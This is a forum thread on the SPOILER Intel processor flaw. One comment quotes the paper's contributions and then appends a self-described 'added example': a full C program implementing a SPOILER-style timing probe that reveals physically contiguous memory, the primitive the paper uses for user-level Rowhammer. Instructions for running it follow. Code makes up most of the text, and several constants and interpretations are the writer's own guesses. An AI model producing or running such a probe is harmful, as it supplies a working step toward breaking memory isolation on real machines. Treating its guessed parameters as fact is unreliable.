
Intel Processors Longtime Flawed - galaxyLogic
https://www.theregister.co.uk/2019/03/05/spoiler_intel_processor_flaw/
======
convivialdingo
From the paper:
[https://arxiv.org/pdf/1903.00446.pdf](https://arxiv.org/pdf/1903.00446.pdf)

1.1 Our Contribution

We have discovered a novel microarchitectural leakage which reveals critical
information about physical page mappings to user space processes. The leakage
can be exploited by a limited set of instructions, which is visible in all
Intel generations starting from the 1st generation of Intel Core processors,
independent of the OS and also works from within virtual machines and
sandboxed environments. In summary, this work:

1. exposes a previously unknown microarchitectural leakage stemming from
the false dependency hazards during speculative load operations.

2. proposes an attack, SPOILER, to efficiently exploit this leakage to speed
up the reverse engineering of virtual-to-physical mappings by a factor of 256
from both native and JavaScript environments.

3. demonstrates a novel eviction set search technique from JavaScript and
compares its reliability and efficiency to existing approaches.

4. achieves efficient DRAM row conflicts and the first double-sided Rowhammer
attack with normal user-level privilege using the contiguous memory detection
capability of SPOILER.

5\. explores how SPOILER can track nearby load operations from a more
privileged security domain right after a context switch.
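The contribution list above describes the primitive but not what the measurement loop looks like. The following is an added example, not code from the paper, the Register article or the commenter: a SPOILER-style probe that fills the store buffer with stores to the same 4K offset in a window of pages, times a load from the target page with rdtscp, and then looks for the latency peaks spaced 256 pages apart (1 MB / 4 KB) that mark physically contiguous memory. The page count, window size, round count, the 1.5x-median peak threshold and the 8-bit (factor 256) reading of the leak are my assumptions; the timing part only runs on x86-64 and the absolute cycle values will differ per machine.

```c
/* Added example: SPOILER-style probe for the speculative-load false-dependency
   leak. Not the paper's code; all constants below are assumptions to tune. */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE    4096UL
#define NPAGES  1024UL  /* pages scanned (assumption: spans several 1 MB regions) */
#define WINDOW  64UL    /* 4K-aliased stores issued before each timed load (assumption) */
#define ROUNDS  50      /* repetitions per page; the median is kept */

#if defined(__x86_64__)
/* Time one load with rdtscp. The preceding stores are still in the store buffer
   when the load issues; a store that also matches the load's physical address
   bits above the 4K offset triggers the false dependency hazard the paper
   describes, and the extra cycles are the leak. */
static inline uint64_t time_load(const uint8_t *addr)
{
    uint32_t lo0, hi0, lo1, hi1;
    __asm__ volatile(
        "rdtscp\n\t"
        "mov %%eax, %[lo0]\n\t"
        "mov %%edx, %[hi0]\n\t"
        "mov (%[a]), %%ecx\n\t"   /* the timed, 4K-aliased load */
        "rdtscp\n\t"
        : [lo0] "=&r"(lo0), [hi0] "=&r"(hi0), "=&a"(lo1), "=&d"(hi1)
        : [a] "r"(addr)
        : "rcx", "memory");
    return (((uint64_t)hi1 << 32) | lo1) - (((uint64_t)hi0 << 32) | lo0);
}
#else
static inline uint64_t time_load(const uint8_t *addr) { (void)addr; return 0; } /* no rdtscp */
#endif

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

static uint64_t median_u64(uint64_t *v, size_t n)   /* sorts v in place */
{
    qsort(v, n, sizeof *v, cmp_u64);
    return v[n / 2];
}

/* Latency of a load from page p after WINDOW stores to the same offset in the
   pages above it. Every store is 4K-aliased with the load; only a store whose
   physical address bits also match beyond bit 12 produces the large stall. */
static uint64_t measure_page(uint8_t *buf, size_t p)
{
    volatile uint8_t *vb = buf;
    uint64_t t[ROUNDS];
    for (int r = 0; r < ROUNDS; r++) {
        for (size_t i = WINDOW; i > 0; i--)
            vb[(p + i) * PAGE] = (uint8_t)r;
        t[r] = time_load(buf + p * PAGE);
    }
    return median_u64(t, ROUNDS);
}

/* Most common distance between consecutive latency peaks (0 if fewer than two).
   Physically contiguous pages show peaks 256 pages apart: 1 MB / 4 KB = 256,
   i.e. the leaked 8 address bits repeat with that period (my reading of the
   "factor of 256"). SPOILER uses that to find contiguous memory for Rowhammer.
   Requires n <= NPAGES. */
static size_t dominant_peak_stride(const uint64_t *lat, size_t n, uint64_t threshold)
{
    size_t hist[NPAGES] = {0}, last = SIZE_MAX, best = 0;
    for (size_t p = 0; p < n; p++) {
        if (lat[p] < threshold) continue;
        if (last != SIZE_MAX && p - last < NPAGES) hist[p - last]++;
        last = p;
    }
    for (size_t d = 1; d < NPAGES; d++)
        if (hist[d] > hist[best]) best = d;
    return best;
}

/* 1.5x the median latency as the peak threshold is an assumption; tune per machine. */
static uint64_t peak_threshold(const uint64_t *lat, size_t n)
{
    uint64_t tmp[NPAGES];
    memcpy(tmp, lat, n * sizeof *lat);
    uint64_t med = median_u64(tmp, n);
    return med + med / 2;
}

/* Constructed trace for checking the analysis offline: 40-cycle baseline with
   200-cycle stalls every 256 pages, as a contiguous 1 MB region would produce. */
static size_t stride_of_synthetic_trace(void)
{
    uint64_t lat[NPAGES];
    for (size_t p = 0; p < NPAGES; p++) lat[p] = 40 + (p % 256 == 100 ? 160 : 0);
    return dominant_peak_stride(lat, NPAGES, peak_threshold(lat, NPAGES));
}

int main(void)
{
    size_t len = (NPAGES + WINDOW + 1) * PAGE;
    uint8_t *buf = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
    memset(buf, 1, len);                       /* back every page before measuring */
    static uint64_t lat[NPAGES];
    for (size_t p = 0; p < NPAGES; p++) lat[p] = measure_page(buf, p);
    uint64_t thr = peak_threshold(lat, NPAGES);
    for (size_t p = 0; p < NPAGES; p++)
        if (lat[p] >= thr) printf("page %4zu: %llu cycles\n", p, (unsigned long long)lat[p]);
    printf("dominant peak stride: %zu pages (256 = contiguous 1 MB)\n",
           dominant_peak_stride(lat, NPAGES, thr));
    munmap(buf, len);
    return 0;
}
```

Run it pinned to one core (e.g. under taskset) with the machine otherwise idle; the peaks are a few tens of cycles above baseline, so noise from interrupts and frequency scaling matters, which is why the per-page median is used rather than a single sample. On a non-Intel or virtualised core the trace may be flat, which the paper's own claim (all Intel Core generations, including inside VMs) makes a useful negative result to record.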

